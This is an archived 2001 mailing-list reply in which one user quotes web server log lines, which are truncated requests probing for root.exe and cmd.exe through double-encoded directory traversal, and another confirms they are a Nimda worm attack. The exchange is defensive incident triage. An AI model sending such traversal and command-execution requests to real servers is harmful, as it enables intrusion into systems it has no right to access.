Re: Nimda

Subject: Re: Nimda
From: nathan_buck (nathb@efn.org)
Date: Fri Sep 21 2001 - 13:53:23 MDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: Jim Jagielski: "Re: Nimda"
• Previous message: Robert Brandtjen: "Re: Nimda"
• In reply to: Brian Watson: "Nimda"
• Reply: nathan_buck: "Re: Nimda"

Yep thats a nimda attack.

On Fri, 21 Sep 2001, Brian Watson wrote:

> 24.129.1.10 - - [18/Sep/2001:13:11:31 -0400] "GET
> /scripts/root.exe?/c+dir HTTP$
> 24.129.1.10 - - [18/Sep/2001:13:11:31 -0400] "GET
> /MSADC/root.exe?/c+dir HTTP/1$
> 24.129.1.10 - - [18/Sep/2001:13:11:32 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+$
> 24.129.1.10 - - [18/Sep/2001:13:11:33 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+$
> 24.129.1.10 - - [18/Sep/2001:13:11:34 -0400] "GET
> /scripts/..%255c../winnt/syst$
> 24.129.1.10 - - [18/Sep/2001:13:11:34 -0400] "GET
> /_vti_bin/..%255c../..%255c..$
> 24.129.1.10 - - [18/Sep/2001:13:11:35 -0400] "GET
> /_mem_bin/..%255c../..%255c..$
>
> Is this a Nimda infected machine?
>
> --Brian
>

-----[nathan]---[http://kanga.i85.net]-------[nathb@efn.org]-----[monkey]---

• Next message: Jim Jagielski: "Re: Nimda"
• Previous message: Robert Brandtjen: "Re: Nimda"
• In reply to: Brian Watson: "Nimda"
• Reply: nathan_buck: "Re: Nimda"

This archive was generated by hypermail 2a24 : Fri Sep 21 2001 - 13:03:23 MDT